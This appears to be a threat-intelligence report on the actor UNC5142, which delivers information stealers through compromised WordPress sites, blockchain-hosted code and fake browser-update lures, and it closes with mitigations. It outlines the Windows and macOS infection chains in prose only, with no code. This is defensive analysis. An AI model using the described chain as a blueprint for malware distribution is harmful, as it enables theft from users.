Full Report
A financially motivated threat actor codenamed UNC5142 has been observed abusing blockchain smart contracts as a way to facilitate the distribution of information stealers such as Atomic (AMOS), Lumma, Rhadamanthys (aka RADTHIEF), and Vidar, targeting both Windows and Apple macOS systems. "UNC5142 is characterized by its use of compromised WordPress websites and 'EtherHiding,' a technique used
Analysis Summary
# Threat Actor: UNC5142
## Attribution & Identity
* **Identified By:** Google Threat Intelligence Group (GTIG).
* **Known Aliases:** UNC5142.
* **Associated Groups:** The techniques and downloader used (CLEARSHORT) suggest a link to ClearFake, which was analyzed by Sekoia.
## Activity Summary
UNC5142 is a financially motivated threat actor observed abusing blockchain smart contracts to distribute malware. Their operations prominently feature the compromise of WordPress websites, often leading to the loading of custom JavaScript to initiate the multi-stage infection chain. The activity level peaked around June 2025, with approximately 14,000 infected web pages flagged, but reports indicate activity ceased after July 23, 2025. The group has shown operational evolution, moving from single-contract schemes to a more complex three-smart contract system (Router-Logic-Storage architecture) starting in November 2024.
## Tactics, Techniques & Procedures
* **Infection Vector:** Compromised WordPress websites (plugin files, theme files, or direct database injection).
* **Code Obfuscation/Distribution:** Use of "EtherHiding"—placing malicious code or data on a public blockchain (BNB Smart Chain/BSC) to increase resiliency against takedowns.
* **Dropper:** Employing a multi-stage JavaScript downloader dubbed **CLEARSHORT** (assessed as a variant of ClearFake).
* **Social Engineering:** Utilizing the **ClickFix** social engineering tactic (fake browser update warnings) to deceive victims into executing malicious commands via the Windows Run dialog or macOS Terminal.
* **Windows Execution Chain:**
1. Insertion of Stage 1 JavaScript.
2. Retrieval of CLEARSHORT landing page (often encrypted as of Dec 2024) from external server/Cloudflare .dev page via smart contract interaction.
3. Deception via ClickFix leading to execution of a command that downloads and runs an HTML Application (HTA) file from MediaFire.
4. HTA executes a PowerShell script to bypass defenses, fetch the final payload (from GitHub, MediaFire, or proprietary infrastructure), and execute the stealer directly in memory (fileless).
* **macOS Execution Chain:**
1. ClickFix decoy prompts user to run a bash command in Terminal.
2. The bash script retrieves a shell script.
3. The script uses `curl` to download the Atomic Stealer payload.
* **MITRE ATT&CK IDs (Inferred/Associated TTPs):** T1059 (Command and Scripting Interpreter), T1566.002 (Phishing: Spearphishing Link - via social engineering), T1560.001 (Archive via encryption), T1027 (Obfuscated Files or Information - EtherHiding).
## Targeting
* **Sectors:** Not explicitly specified, but the broad deployment of malware via compromised WordPress sites suggests indiscriminate targeting of web assets that host vulnerable sites.
* **Geography:** Indiscriminate targeting of Windows and Apple macOS systems globally.
* **Victims:** "Vulnerable WordPress sites" were targeted en masse (approx. 14,000 flagged pages). Specific victim organizations were not named.
## Tools & Infrastructure
* **Malware Families (Information Stealers):** Atomic (AMOS), Lumma, Rhadamanthys (RADTHIEF), and Vidar.
* **Downloaders/Frameworks:** CLEARSHORT (variant of ClearFake).
* **Blockchain:** BNB Smart Chain (BSC) used to host malicious smart contracts.
* **C2/Payload Hosting:** Cloudflare .dev pages (for landing pages), MediaFire (for HTAs/payloads), GitHub (for payloads).
* **Infrastructure (Defanged):**
* `hxxps://thehackernews.com/2025/10/hackers-abuse-blockchain-smart.html#email-outer` (Unrelated subscription link)
* `hxxps://cloud.google.com/blog/topics/threat-intelligence/unc5142-etherhiding-distribute-malware` (Source article)
## Implications
UNC5142 represents a significant evolution in malware distribution, leveraging decentralized blockchain technology (EtherHiding) to enhance operational resilience against traditional web infrastructure takedowns. The actor’s use of high-profile legitimate services (Cloudflare, GitHub, MediaFire) alongside advanced scripting and fileless techniques (PowerShell in memory execution) severely complicates detection and forensic efforts, particularly for organizations relying on endpoint protection alone. The threat actors are financially motivated.
## Mitigations
* Implement robust security practices for WordPress installations, including timely patching of core, themes, and plugins.
* Scrutinize JavaScript assets loaded onto websites, searching for injected scripts that make external beaconing calls, especially those attempting to interact with Layer 1/2 blockchain nodes or contracts.
* Deploy network monitoring to detect egress traffic attempting to download secondary payloads from non-standard file-sharing services (MediaFire) or repositories (GitHub) in response to legitimate user navigation.
* For endpoint defense, focus on blocking HTA execution, PowerShell defense evasion techniques, and behavioral indicators of information stealer activity, especially memory injection, given the fileless nature on Windows.
* Monitor blockchain activity for unusual contract deployments associated with known threat indicators, though this is a more advanced defensive measure.